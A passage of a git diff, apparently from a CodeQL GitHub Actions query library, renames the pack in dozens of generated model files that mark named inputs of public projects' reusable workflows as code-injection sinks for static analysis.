githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml index 489e005cc0ec..43d0fe1c2ce6 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml index 3a0e723e9f70..4fb13f0a18cc 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.module", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml index 893be8a27259..96b73aa06de6 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.environment", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml index 75877fa48aa7..554974bfe6f5 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml index 489e6134eba4..f1c6ec345d19 100644 --- a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "input.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml index 4feef931f71e..2cfa8a46c83e 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml index 189cd8bbafdc..8c3c5a585028 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml index 418694a596d1..aa75ce39295d 100644 --- a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "input.dist-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml index 10c4f8a3e3c3..e9dd33c6f175 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "input.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml index 1837a505499e..a0bd22ad352e 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "input.terraform_workingdir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml index 094e4602e8e2..fb98c6a7d9b8 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml index ec264f96bf16..0c108422a94e 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml index 7463396b1522..c820724bd71e 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.shell", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml index 4c52a10d4f1d..51d32bde4ba7 100644 --- a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml index a6c5a8b8e3bc..b747a4a27df1 100644 --- a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml index 286e75fc9e20..c5c26bc7926f 100644 --- a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.REGISTRY", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml index 9ea5a9a34c70..62a1a853937d 100644 --- a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "input.features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml index 34e41e9c589d..b6c0c1b5e644 100644 --- a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml index cc38156973bd..005db8e9ddce 100644 --- a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.destination-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml index 748287e75f82..a1090c45ae08 100644 --- a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cemu-project/cemu/.github/workflows/build.yml", "*", "input.experimentalversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml index 703a138d28d7..051aacfeee04 100644 --- a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml index 97f1bafd1f38..1fb380a3a725 100644 --- a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cgal/cgal/.github/workflows/send_email.yml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml index 064c946363f7..a8b8234e1fc5 100644 --- a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml index 4a5c66bc7440..108bbad1c072 100644 --- a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.docker-context", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml index a1e4b624b454..42ed67f3d208 100644 --- a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.scala", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml index 888aed947da2..a664d6063e30 100644 --- a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.test_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml index 3b5f69e93423..6270ab5842ee 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml index 8e28b46f2c70..0c4d975e0129 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml", "*", "input.matrix-key", "output.result", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml index 7f63b48ed848..64fc3792659c 100644 --- a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_sim", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml index e7e42031e047..f48be6693d06 100644 --- a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml index 0c34609ccefc..f2ebae0b0eac 100644 --- a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.millargs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml index 82de946e406e..ec591db22ac9 100644 --- a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.upgrade-plan-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml index 09c4c2a83c31..06fdea3f8a26 100644 --- a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.latest", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml index 0e4571fc728b..b864551b3fbe 100644 --- a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml index 6a03acfb11dc..fdb499a81dcb 100644 --- a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.pr-number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml index f41ee1211d3d..c831a5d6d8f9 100644 --- a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml index 8a64c0ce5f11..d9d4e9bd2fa9 100644 --- a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.mage-targets", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml index 18e66bf72913..4091c74dee5a 100644 --- a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.deploy_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml index 1ed7561a5334..1c6d8804d6d1 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "input.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml index 738fde2cb865..f94c87537cf4 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "input.ddtrace-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml index c61a63f11443..efb8e467a0a0 100644 --- a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml index fef036f4f297..8a7b36e365c5 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml index b13ba8bc40f0..0d6fb59ed509 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml index 3fb2fefff6b9..74bdb5ab2801 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml index 4344e254be05..038fd953d6e8 100644 --- a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["decidim/decidim/.github/workflows/test_app.yml", "*", "input.test_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml index 2a7c5feafead..0c185f4cbd56 100644 --- a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "input.release_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml index 9ccb41c3a8c9..44e89b4e2518 100644 --- a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "input.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml index b71e6c001d00..6b4feeedf62f 100644 --- a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "input.test-script", "code-injection", "generated"] diff --git 